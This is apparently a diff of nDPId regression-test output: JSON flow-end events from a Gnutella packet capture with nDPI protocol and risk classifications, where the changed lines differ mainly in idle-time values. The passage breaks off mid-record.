-00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90743,"flow_last_seen":96110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":628,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1789,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90740,"flow_last_seen":91277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90740,"flow_last_seen":91408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90742,"flow_last_seen":91375,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90746,"flow_last_seen":91439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3759,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90744,"flow_last_seen":98168,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -01250{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":90746,"flow_last_seen":90948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3245,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":91415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90746,"flow_last_seen":90799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":90746,"flow_last_seen":91392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3761,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91151,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":1717,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85126,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1138,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74328,"flow_last_seen":88171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90842,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":91380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":90863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1090,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90747,"flow_last_seen":91396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3774,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90747,"flow_last_seen":90902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":670,"flow_tot_l4_payload_len":1773,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":87671,"flow_last_seen":88801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":87671,"flow_last_seen":88801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90739,"flow_last_seen":91076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1789,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90809,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90740,"flow_last_seen":91277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":83805,"flow_last_seen":84251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90740,"flow_last_seen":91408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 